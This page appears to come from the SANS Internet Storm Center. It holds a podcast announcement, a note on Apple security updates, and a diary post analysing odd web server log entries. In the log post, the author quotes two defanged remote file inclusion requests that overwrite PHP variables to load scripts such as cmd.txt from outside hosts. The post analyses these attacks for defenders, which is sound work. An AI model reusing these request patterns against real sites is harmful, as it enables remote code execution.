Podcast Episode Eight Posted
Thanks to all of those who joined us live last night! It was great to have that live feedback. Johannes and I were all live on video and audio, and despite a few hiccups, it was great. It turns out that we have a great discussion AFTER the live podcast with all the people that are live (you must be a registered stickam member to be able to participate). I think I may start recording that portion as well, maybe we'll publish that as well!
We published Episode Eight of the Internet Storm Center Podcast last night after the record.
It would be great if we could increase the live listener count, as I'd like to do a live Q&A via the listeners, (and other fun live events).
Go grab it through iTunes.
Direct download of the mp3 is here, for those of you that are not iTunes users.
--
Joel Esler
One Bushel of Apple Updates
Apple is updating many systems this week (in paritcular today) to get ready for the iPhone 3G launch and the new "MobileMe" software. Its not exactly within your scope to cover product updates or releases like that. However, some of the updates released today are security relevant. For example the new AppleTV software includes a number of security patches. A new version of Quicktime ( 7.7.0.43) was released as well (thanks David!).
It is not clear if the new version of iTunes (7.7) released today includes any security fixes.
------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Weblog Observations
In this diary, I will share a few odd log entries from our ISC web logs from the last couple days. Not all of them are attacks. In some cases, they look like honest mistakes, in others, I am not sure what is going on ;-).... of course, there are also some genuine attacks here:
Buggy RSS Reader?
Here a request from earlier today. It triggered an alert as it exceeded the maximum request variable name length:
rss</administrator/components/com_peoplebook/param_peoplebook_php?mosConfig_absolute_path
looks to me like a buggy RSS reader. We attach 'rss' to links in our RSS feed. The remaining "tags" don't look like XSS. So in my opinion not an attack
Remote File Insertion
GET /index.html?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1& GLOBALS=&mosConfig_absolute_path=hxxp: // www. csccog. org/mambots/system/.bash/did.txt? GET //index.php?_SERVER[DOCUMENT_ROOT]= hxxp: // rosenkrieger . herateam .de/phpRaider /authentication/phpbb3/cmd.txt
Now these are "genuine" attacks. The goal here is to overwrite variables and use them for remote file execution attacks. I modified them to prevent accidental clicking. They shouldn't cause any harm to the browser, but you never know...
More Client Bugs? Or someone playing?
GET /diary.html?date=2005%C2%AD05%C2%AD09%E2%80%93%00%00
With this one, I am not sure. The request was blocked because it included a '%00' at the end. The parameter should be a date in this YYYY-MM-DD format. Oddly enough, there was o referer set, but the user agent looked "legit" (easily faked... I know). The same IP address sent other (valid) requests with the same user agent. However, these other requests included cookies, while this particular one didn't... hm. Maybe its someone playing after all? Using a proxy to manipulate requests?
Monster Cookie from Hell.
This request included 3 oddly formated (and very long) cookies. The cookie names are pc1, pv1, bh and ih. "ih" is by far the longest, about 1180 characters long! The cookies all look very similar. Here is the shortest on (pc1):
pc1=\"b!!!!#!!,Ms!!E(x!!PQ4!#0Lh!!I7JGfb<6!!mT+'k4o:!w1K*!!28a!![ <K!![h(~~~~~:7LG_:7e@YM.jTN\";
The one "feature" that sticks out are a lot of exclamation marks (more so in the other values).
In conclusion: Keep checking your logs! Let us know if you see something odd.... or if you got more details about the logs I posted above.
------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Comments